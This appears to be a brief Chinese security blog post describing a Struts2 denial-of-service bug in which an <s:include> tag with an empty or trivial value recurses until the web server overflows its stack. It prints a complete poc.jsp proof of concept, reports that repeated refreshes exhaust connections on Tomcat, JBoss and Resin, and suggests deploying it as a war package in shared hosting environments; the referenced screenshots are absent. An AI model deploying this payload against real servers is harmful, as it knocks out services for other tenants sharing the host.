Struts2解析某些value值的include标签,webServer StackOverflow

比如:

<s:include value="" />
<s:include value="." />
<s:include value="/" />
<s:include value="?" />

poc.jsp:

<%@ page language="java" contentType="text/html; charset=utf-8" pageEncoding="utf-8"%>
<%@ taglib prefix="s" uri="/struts-tags"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title></title>
</head>
<body>
<s:include value="" />PoC
</body>
</html>

访问poc.jsp后发现,webServer出现明显的递归调用输出:

异常:

然后按住F5刷新一小伙儿,webServer的连接数马上就被打满(tomcat,jboss,resin等测试直接打死,GlassFish可能不明显):

如resin:

利用:

虽然是本地拒绝服务,但对于共享webServer的环境效果还是不错的(以及StackOverflow其他方面的利用),比如:丢个war包给那个啥...

文章目录